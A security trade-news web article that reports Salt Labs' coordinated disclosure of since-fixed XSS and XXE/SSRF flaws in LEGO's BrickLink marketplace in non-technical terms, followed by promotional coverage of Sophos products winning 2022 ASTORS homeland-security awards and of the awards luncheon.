API Security Flaws Found within The LEGO® Group Online Service Platform

Two API security vulnerabilities were discovered within BrickLink, a digital resale platform owned by The LEGO® Group. With more than one million members, Bricklink serves as the world's largest online marketplace to buy and sell second-hand LEGO. The API security flaws could have allowed for large-scale account takeover (ATO) attacks on customers’ accounts. (Courtesy of The Lego Group)

Salt Labs has released new threat research highlighting two API security vulnerabilities discovered within BrickLink, a digital resale platform owned by The LEGO® Group which could have enabled attackers to compromise LEGO’s internal servers and exfiltrate global users’ private account data.

With more than one million members, Bricklink is the world’s largest online marketplace to buy and sell second-hand LEGO.

(Learn more about The Lego Group in this interview with Lauren von Stackelberg. Courtesy of The Lego Group and YouTube.)

The API security flaws found and reported by API security provider Salt Security could have allowed for both large-scale account takeover (ATO) attacks on customers’ accounts and server compromise, enabling bad actors to:

  • Manipulate platform users to gain complete control over their accounts.

  • Leak personal identifiable information (PII) and other sensitive user data stored internally by the platform.

  • Gain access to internal production data, which could have led to a full compromise of the company’s internal servers.

Salt Labs, the research arm of Salt Security and a public forum for API security education, discovered discovered both vulnerabilities by examining areas of the site that support user input fields.

In the “Find Username” dialog box of the coupon search functionality, researchers found a cross-site scripting (XSS) vulnerability that enabled them to inject and execute code on a victim end user’s machine through a crafted link. The team was able to chain the XSS vulnerability with a Session ID exposed on a different page.

By combining those two vulnerabilities, the researchers could hijack the session and achieve an account takeover (ATO). Bad actors could have used these tactics for full ATO or to steal sensitive user data.

The second vulnerability was found within the platform’s “Upload to Wanted List” page. This endpoint allows users to upload lists of wanted LEGO parts and sets in XML format. Using this feature, Salt Labs researchers could execute an XML External Entity (XXE) injection attack, where an XML input containing a reference to an external entity is processed by a weakly configured XML parser.

By leveraging the XXE injection attack, researchers could read files on the web server and execute a server-side request forgery (SSRF) attack that could be abused in many ways – for example, to steal AWS EC2 tokens of the server.

Upon discovering the vulnerabilities, Salt Labs’ researchers followed coordinated disclosure practices with LEGO, and all issues were remediated swiftly.

Yaniv Balmas, Salt Security VP of Research
Yaniv Balmas, Salt Security VP of Research

“Today, nearly all business sectors have increased their usage of APIs to enable new functionality and streamline the connection between consumers and vital data and services,” explained Yaniv Balmas, VP of Research, Salt Security.

“As a result, APIs have become one of the largest and most significant attack vectors to gain access to company systems and user data.”

“As organizations rapidly scale, many remain unaware of the sheer volume of API security risks and vulnerabilities that exist within their platforms, leaving companies and their valuable data exposed to bad actors.”

According to the recent Salt Security State of API Security Report, Q3 2022, clients of Salt experienced a 117% increase in API attack traffic while their overall API traffic grew 168%.

The Salt Security API Protection Platform enables companies to identify risks and vulnerabilities in APIs before they are exploited by attackers, including those listed in the OWASP API Top 10.

(Learn how the Salt Security API Protection Platform helps make it safe to innovate. Courtesy of Salt Security and YouTube.)

The platform protects APIs across their full lifecycle: build, deploy, and runtime phases, utilizing cloud-scale big data combined with AI and ML to baseline millions of users and APIs.

By delivering context-based insights across the entire API lifecycle, Salt enables users to detect the reconnaissance activity of bad actors and block them before they can reach their objective. The exploits the Salt Labs team performed would have immediately triggered the Salt platform to highlight the attack.

To learn more, go to salt.security.

Related technologies…

Sophos MDR Takes 2022 Platinum ‘ASTORS’ for Best Cyber Managed Threat Response

Attendees enjoying the 2022 ‘ASTORS’ Awards Ceremony: (left to right), Dr. Kathleen Kiernan, President of NEC National Security Solutions (NSS); John Boyd Assistant Director of the DHS Office of Biometric Identity Management (OBIM); Jim Robell, President of Fortior Solutions and the 2022 ‘ASTORS’ Industry Leadership & Innovation Person of the Year; Commissioner Bill Bratton, Kym Craven, Executive Director for the National Association of Women Law Enforcement Executives (NAWLEE); CBP OFO DEAC Diane Sabatino, the 2022 ‘ASTORS’ Government Leadership & Innovation Person of the Year; OBIM Chief of Staff Penelope Smith; Frank Russo, CBP OFO Director of Field Operations NY & NJ; and Celinez Nunez, Assistant Director & Chief Security Officer for the Bureau of Alcohol, Tobacco, Firearms & Explosives (ATF).
Attendees enjoying the 2022 ‘ASTORS’ Awards Ceremony Include: (left to right), Dr. Kathleen Kiernan, President of NEC National Security Solutions (NSS); John Boyd Assistant Director of the DHS Office of Biometric Identity Management (OBIM); Jim Robell, President of Fortior Solutions and the 2022 ‘ASTORS’ Industry Leadership & Innovation Person of the Year; Legendary Police Commissioner Bill Bratton; Kym Craven, Executive Director for the National Association of Women Law Enforcement Executives (NAWLEE); CBP OFO DEAC Diane Sabatino, the 2022 ‘ASTORS’ Government Leadership & Innovation Person of the Year; OBIM Chief of Staff Penelope Smith; Frank Russo, CBP OFO Director of Field Operations NY & NJ; and Celinez Nunez, Assistant Director & Chief Security Officer for the Bureau of Alcohol, Tobacco, Firearms & Explosives (ATF).

American Security Today’s Annual ‘ASTORS’ Awards is the preeminent U.S. Homeland Security Awards Program, and now in its Seventh Year, continues to recognize industry leaders of Physical and Border Security, Cybersecurity, Emergency Preparedness – Management and Response, Law Enforcement, First Responders, as well as federal, state and municipal government agencies in the acknowledgment of their outstanding efforts to Keep our Nation Secure.

Sophos (First of Four)

Best Anti-Malware Solution

Sophos Intercept X Advanced with XDR

  • As organizations worldwide adopted remote work and increasingly managed globally distributed networks and cloud-based applications, the incidence of cyberattacks increased significantly. The statistics are alarming.

  • According to Sophos’s 2022 State of Ransomware Report, Ransom attacks are more frequent (66% of organizations surveyed were hit with ransomware in 2021, up from 37% in 2020); Ransom payments are higher (In 2021, 11% of organizations said they paid ransoms of $1 million or more, up from 4% in 2020); and the average cost to recover from the most recent ransomware attack in 2021 was $1.4 million.

  • To defend against such threats, organizations require an anti-malware solution that provides next-generation anti-exploit and anti-ransomware technology and root cause analysis. Sophos Intercept X Advanced with XDR (Extended Detection and Response), the first and only endpoint security solution built for IT managers and cybersecurity experts, addresses each of these criteria.

(Sophos Intercept X is the world’s best endpoint protection – combining ransomware protection, deep learning malware detection, exploit prevention, EDR, and more in a single solution. Courtesy of Sophos and YouTube.)

  • Intercept X Advanced with XDR revolutionizes endpoint security, turning traditional reactive defense on its head with a proactive approach. It assesses the threat landscape, processes limitless samples, and makes more accurate predictions faster than traditional machine learning solutions for a more intelligent response to cybersecurity risks.

  • Furthermore, Intercept X Advanced with XDR is the industry’s only extended detection and response solution that synchronizes native endpoint, server, firewall, and email security, including Sophos MDR, a fully managed threat hunting, detection, and response service, that fuses machine learning technology and expert analysis for improved threat hunting and detection, deeper investigation of alerts, and targeted actions to eliminate threats with speed and precision.

Sophos (Second of Four)

Best Cyber Managed Threat Response

  • Sophos MDR

  • Sophos Managed Detection and Response (formerly Managed Threat Response) is a fully-managed threat hunting, detection, and response service that provides a dedicated 24/7 security team to rapidly identify and neutralize sophisticated and complex threats targeting your computers, servers, networks, cloud workloads, email accounts, and more.

Sophos MDR identifies and neutralizes in-progress attacks – including ransomware, network breaches, hands-on keyboard adversaries, and more – to minimize damage and costs and reduce recovery time.
Sophos MDR identifies and neutralizes in-progress attacks – including ransomware, network breaches, hands-on keyboard adversaries, and more – to minimize damage and costs and reduce recovery time.
  • Sophos MDR protects more than one million devices and has seen more than 500% growth since August 2020. It now protects over 8,500 customers and is one of the industry’s most widely used managed detection and response services.

  • Sophos MDR fuses machine learning with human analysis for an evolved, innovative approach to proactive security protection, combining Sophos’ top-rated endpoint protection and data-driven Extended Detection & Response (XDR) with a world-class team of experts to neutralize the most complex threats.

  • By leveraging proprietary investigation techniques to differentiate attacker tactics, techniques, and procedures (TTPs) that can appear normal and go undetected, Sophos MDR can better anticipate attacker behavior and identify new indicators of attack and compromise. Sophos MTR is customizable with service tiers and response modes to meet organizations’ evolving needs, providing them control over how and when incidents are escalated and what response actions are taken.

  • Sophos MDR stands apart from top competitors with its ability to proactively take action to mitigate threats, and unlike competing services that stop at notifications, Sophos MDR neutralizes active threats, by highly trained teams of world-class experts remotely disrupt, containing and neutralizing threats with speed and precision. 

(The next time you have an active incident, remember that Sophos Rapid Response is available 24/7 with a team of incident response experts to provide the fastest relief available. Courtesy of Sophos and Vimeo.)

  • Other services have complex hourly pricing structures, whereas Sophos MDR provides cost predictability with fixed-fee services, and enables responders to cut through red tape that could delay precious time to neutralize an active attacker that could potentially destroy businesses.

Sophos (Third of Four)

Best Endpoint Threat Solution

  • Sophos Intercept X Advanced with XDR

  • Sophos Intercept X combines anti-exploit, anti-ransomware, deep learning AI and control technology it stops attacks before they impact your systems, using a comprehensive, defense in-depth approach to endpoint protection, rather than relying on one primary security technique.

Sophos Intercept X Advanced with XDR
Intercept X Advanced with XDR, a leader in the 2021 Gartner Magic Quadrant for Endpoint Protection Platforms (EPP), offers the industry’s best malware detection engine and state-of-the-art anti-ransomware technology.
  • Cyberattacks threaten not only the security but also the financial health of organizations. According to Sophos’s State of Ransomware 2022 report, the average cost to recover from a ransomware attack in 2021 was $1.4 million. Intercept X not only reduces these costs significantly; it also provides substantial help in preventing the cyberattacks in the first place.

  • Customers report an 85% decrease in cyberattacks since they began using Intercept X with Advanced XDR and say that the reduction in time spent on remediation has made them twice as efficient at day-to-day tasks.

  • Such efficiencies have propelled Intercept X with Advanced XDR’s market share to an all-time high. Sophos expects the momentum to continue as cybercriminals keep finding new methods of threatening organizations across multiple endpoints.

Sophos (Fourth of Four)

Best Network Security Solution

  • Sophos Firewall

  • The average cost to recover from the most recent ransomware attack in 2021 was $1.4 million. To defend against such threats, organizations require a network security solution that delivers advanced protection against cyberattacks without sacrificing performance or flexibility. Sophos Firewall does exactly that.

Sophos Firewall’s Xstream architecture protects your network from the latest threats while accelerating your important SaaS, SD-WAN, and cloud application traffic.
Sophos Firewall’s Xstream architecture protects your network from the latest threats while accelerating your important SaaS, SD-WAN, and cloud application traffic.
  • In April 2021, Sophos upgraded the product’s hardware with XGS Series appliances that provide the industry’s best zero-day threat protection, with native support for TLS 1.3, which is up to five times faster than other models available on the market today. The TLS capabilities are critical tools in battling cybercrime: nearly half of the malware Sophos detected in January through March 2021 used TLS to conceal malicious communications.

  • Sophos Firewall’s recent advancements for software-defined wide area networks (SD-WANs) and virtual private networks (VPNs) enable organizations to address the complexities and risks of the modern encrypted internet without compromising speed or efficiency, and the ability to integrate Sophos Firewall with other Sophos offerings under one unified management umbrella enhances the scalability, efficacy, and efficiency of the product.

(Discover why more and more organizations are switching to the all-new Sophos Firewall.  Courtesy of Sophos and Vimeo.)

  • One of the key integrations is with Sophos ZTNA, a zero-trust network access offering, which micro-segments networks to protect against intrusions, lateral movement, and data theft.

  • Furthermore, users of Sophos Firewall gain access to the Sophos Adaptive Cybersecurity Ecosystem, an open architecture that constantly learns and improves through automation and analytics as well as the collective input of Sophos products, partners, customers, and developers.

  • *Sophos is a new competitor to the 2022 ‘ASTORS’ Homeland Security Awards Program.

Homeland Security remains at the forefront of our national conversation as we experience an immigration crisis along our southern border and crime rates that are dramatically higher than before the Pandemic across the United States.

CBP K9 Team Zaskya Steros and TYKE, with Commissioner Bill Bratton at the 2022 'ASTORS' Awards Luncheon.
CBP K9 Team Zaskya Steros and TYKE, with Commissioner Bill Bratton at the 2022 ‘ASTORS’ Awards Luncheon.

These challenges have become a national priority with an influx of investments in innovative new technologies and systems.

Enter American Security Today, the #1 publication and media platform in the Government Security and Homeland Security fields, with a circulation of over 75,000 readers and many tens of thousands more who visit our AST website at www.americansecuritytoday.com each month.

The pinnacle of the Annual ‘ASTORS’ Awards Program is the Annual ‘ASTORS’ Awards Ceremony Luncheon Banquetan exclusive, full-course plated meal event, in the heart of New York City.

2022 ‘ASTORS’ Awards Luncheon

This year’s exclusive sold-out ‘ASTORS’ luncheon featured representatives of law enforcement, public safety, and industry leaders who came together to honor the selfless service of those who stand on the front lines, and those who stand beside them – providing the capabilities and technologies to create a safer world for generations to come.

This year marks the 20th anniversary of the Department of Homeland Security (DHS), which came out in force, to discuss comprehensive collaborations between private and public sectors that have led to the development of intelligence and technologies which serve to protect our nation.

Deputy Executive Assistant Commissioner (DEAC) Diane Sabatino
Deputy Executive Assistant Commissioner (DEAC) Diane Sabatino, expresses her pride in the women and men of the CBP, and their families who support them.

The continually evolving ‘ASTORS’ Awards Program emphasized the trail of Accomplished Women in Leadership in 2022, as well as the Significance and Positive Impact of Advancing Diversity and Inclusion in our Next Generation of Government and Industry Leaders.

The keynote address was provided by U.S. Customs and Border Protection (CBP) Office of Field Operations (OFO) Deputy Executive Assistant Commissioner (DEAC) Diane Sabatino, who described the changes to CBP through the tragedy of 9/11 and the relentless commitment to its mission and ongoing investment in the latest technologies and innovations to protect our borders and Homeland.

The resounding theme of the DEAC’s remarks was her pride in the women and men of the CBP and their families who support them.

Deputy Inspector Lashonda Dyce accepts a 2022 'ASTORS' Award on behalf of the NYPD TARU Unit for Excellence in Public Safety.
Deputy Inspector Lashonda Dyce accepts a 2022 ‘ASTORS’ Award on behalf of the NYPD TARU Unit for Excellence in Public Safety, joined at left by Commissioner Bill Bratton, and at right Chief of Department Kenneth Corey.

AST was also joined by Legendary Police Commissioner William Bratton, who spoke, as always, about his love for the City of New York, the Profession of law enforcement to which he has dedicated his life, and for which he continues to drive thought leadership and innovation.

New York City Police Department (NYPD) Chief of Department Kenneth Corey, came out to address Luncheon attendees and shared some of his experiences and the changes in policing he’s witnessed over his more than three decades of service.

Katherine Schweit, an attorney, security consultant, and retired FBI special agent, and former head of the FBI’s active shooter program.
Katherine Schweit, attorney, security consultant, retired FBI special agent, and former head of the FBI’s active shooter program.

FDNY Chief Joseph Jardin honored the men and women of the FDNY, not only those who currently serve but all of those who have selflessly served, with a special recognition of those lost on 9/11.

Chief Jardin spoke about the continuing health battle of many following 9/11 with cancer and respiratory disease, yet now knowing the full consequences, would not have made a different decision to respond.

As Chief Jardin noted, mission-driven service is in the lifeblood of every firefighter, volunteer and sworn and has been so throughout the history of the Fire Service.

Former head of the FBI’s active shooter program, Katherine Schweit joined AST to sign complimentary copies of her book, STOP THE KILLING: How to End the Mass Shooting Crisis,’ thanks to the generosity of our 2022 ‘ASTORS’ Awards Sponsors. 

The 2022 ‘ASTORS’ Awards Program was Proudly Sponsored by NEC National Security Systems (NSS), ATI Systems, Automatic Systems of America, guardDog AI, Fortior Solutions, IPVideo Corporation, Rajant Corporation, RX Global, and SIMS Software!

We were pleased to welcome the esteemed New York City Fire Department (FDNY); the New York City Police Department (NYPD); and the NYC Hospital Police,  as well as Executive Management from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and many other DHS agencies, Federal law enforcement agencies, and private/public partnerships such as the National Association of Women Law Enforcement Executives (NAWLEE), the 30×30 Initiative, a coalition of professionals advancing the representation of women in policing; and Operation Lifesaver, Inc. (OLI) (rail safety advocates).

The FDNY was honored in the 2022 'ASTORS' Awards Program for Excellence in Public Safety and Critical Incident Response.
The FDNY was honored in the 2022 ‘ASTORS’ Awards Program for Excellence in Public Safety and Critical Incident Response, accepted by FDNY Chief Joseph Jardin and Deputy Assistant Chief Frank Leeb.

The prestigious Annual ‘ASTORS’ Homeland Security Awards Program highlights the most cutting-edge and forward-thinking security solutions coming onto the market today, to ensure our readers have the information they need to stay ahead of the competition and keep our Nation safe – one facility, street, and city at a time.

Katherine Schweit, former head of the FBI’s active shooter program speaks with 'ASTORS' Attendees and autographs copies of 'STOP THE KILLING: How to End the Mass Shooting Crisis.'
Katherine Schweit, former head of the FBI’s active shooter program speaks with ‘ASTORS’ Attendees and autographs copies of ‘STOP THE KILLING: How to End the Mass Shooting Crisis.’

In 2022 over 240 distinguished guests representing Federal, State, and Local Governments, and Industry Leading Corporate Firms gathered from across North America, Europe, and the Middle East to be honored among their peers in their respective fields.

Each year, to keep our communities safe and secure, security dealers, installers, integrators, and consultants, along with corporate, government, and law enforcement/first responder practitioners, convene in New York City to network, learn and evaluate the latest technologies and solutions from premier exhibiting brands at ISC East, the Natural Disaster & Emergency Management Expo (NDEM EXPO), and the ASIS NYC Expo.

ISC East is the Northeast’s leading security & public safety event, hosted in collaboration with sponsor Security Industry Association (SIA) and in partnership with ASIS NYC.

U.S. Customs and Border Protection (CBP) was Honored at the 2022 ‘ASTORS’ Homeland Security Awards Ceremony and Banquet Luncheon in New York City, featuring OFO DEAC Diane Sabatino and Director of Field Operations NY Area Frank Russo (at center).

Corporate firms, the majority of which return year to year to build upon their Legacy of Wins, include:

Advanced Detection Technologies, AMAROK, ATI SystemsAxis Communications, Automatic Systems, BriefCam, Canon U.S.A., Cellbusters, CornellCookson, CyberArk  Fortior Solutions, guardDog.ai, Hanwha Techwin of America, High Rise Escape Systems, IPVideo Corporation, Konica Minolta Business Solutions, NEC National Security Systems, NICE Public Safety, OnSolve, PureTech Systems, Quantum Corporation, Rave Mobile Safety, Regroup Mass Notification, Robotic Assistance Devices, Rajant Corporation, SafeLogic, Select Engineering Services LLCSinglewire Software, SolarWinds Worldwide, Teledyne FLIR, Valor Systems, and West Virginia American Access Control Systems, just to name a few!

Why American Security Today?

The traditional security marketplace has long been covered by a host of publications putting forward the old-school basics to what is Today – a fast-changing security landscape.

American Security Today is uniquely focused on the broader Homeland Security & Public Safety marketplace with over 75,000 readers at the Federal, State, and local levels of government as well as firms allied to the government.

American Security Today brings forward a fresh compelling look and read with our customized digital publications that hold readers’ eyes throughout the story with cutting-edge editorial that provides solutions to their challenges.

Harness the Power of the Web – with our 100% Mobile Friendly Publications

AST puts forward the Largest and Most Qualified Circulation in Government with Over 75,000 readers on the Federal, State and Local levels.
AST puts forward the Largest and Most Qualified Circulation in Government with Over 75,000 readers on the Federal, State and Local levels.

AST Digital Publications are distributed to over 75,000 qualified government and homeland security professionals, in federal, state, local, and private security sectors.

‘PROTECTING OUR NATION, ONE CITY AT A TIME’

AST Reaches both Private & Public Experts, essential to meeting these new challenges.

Today’s new generation of public safety and security experts need real-time knowledge to deal with domestic and international terrorism, lone wolf attacks, unprecedented urban violence, shifts in society, culture, and media bias – making it increasingly difficult for Homeland Security, Law Enforcement, First Responders, Military and Private Security Professionals to implement coordinated security measures to ensure national security and improve public safety.

American Security Today

These experts are from Government at the federal, state, and local levels as well as from private firms allied to the government.

AST provides a full plate of topics in our AST Monthly Magazine Editions, AST Website, and AST Daily News Alerts, covering 23 Vital Sectors such as Access Control, Perimeter Protection, Video Surveillance/Analytics, Airport Security, Border Security, CBRNE Detection, Border Security, Ports, Cybersecurity, Networking Security, Encryption, Law Enforcement, First Responders, Campus Security, Security Services, Corporate Facilities, and Emergency Response among others.

AST has Expanded readership into integral Critical Infrastructure audiences such as Protection of Nuclear Facilities, Water Plants & Dams, Bridges & Tunnels, and other potential targets of terrorism.

Other areas of concern include Transportation Hubs, Public Assemblies, Government Facilities, Sporting & Concert Stadiums, our Nation’s Schools & Universities, and Commercial Business Destinations – all enticing targets due to the large number of persons and resources clustered together.

To learn more about ‘ASTORS’ Homeland Security Award Winners solutions, Be On the LookOut for the 2022 ‘ASTORS’ CHAMPIONS Edition Fully Interactive Magazine – the Best Products of 2022 ‘A Year in Review’.

The Annual CHAMPIONS edition includes a review of ‘ASTORS’ Award Winning products and programs, highlighting key details on many of the winning firm’s products and services, including video interviews and more.

For example, please see the AST 2020 CHAMPIONS Edition.

It will serve as your Go-To Source throughout the year for ‘The Best of 2022 Products and Services’ endorsed by American Security Today, and can satisfy your agency’s and/or organization’s most pressing Homeland Security and Public Safety needs.

From Physical Security (Access Control, Critical Infrastructure, Perimeter Protection, and Video Surveillance Cameras and Video Management Systems), to IT Security (Cybersecurity, Encryption, Data Storage, Anti-Malware, and Networking Security – to name a few), the 2021 ‘ASTORS’ CHAMPIONS EDITION will have what you need to Detect, Delay, Respond to, and Mitigate today’s real-time threats in our constantly evolving security landscape.

It will also include featured guest editorial pieces from some of the security industry’s most respected leaders, and recognized firms in the 2022 ‘ASTORS’ Awards Program.

A complete list of 2022 ‘ASTORS’ Award Winners will be announced shortly.

For more information on All Things American Security Today, as well as the 2023 ‘ASTORS’ Awards Program, please contact Michael Madsen, AST Publisher at mmadsen@americansecuritytoday.com.

AST strives to meet a 3 STAR trustworthiness rating, based on the following criteria:

  • Provides named sources
  • Reported by more than one notable outlet
  • Includes supporting video, direct statements, or photos

Subscribe to the AST Daily News Alert Here.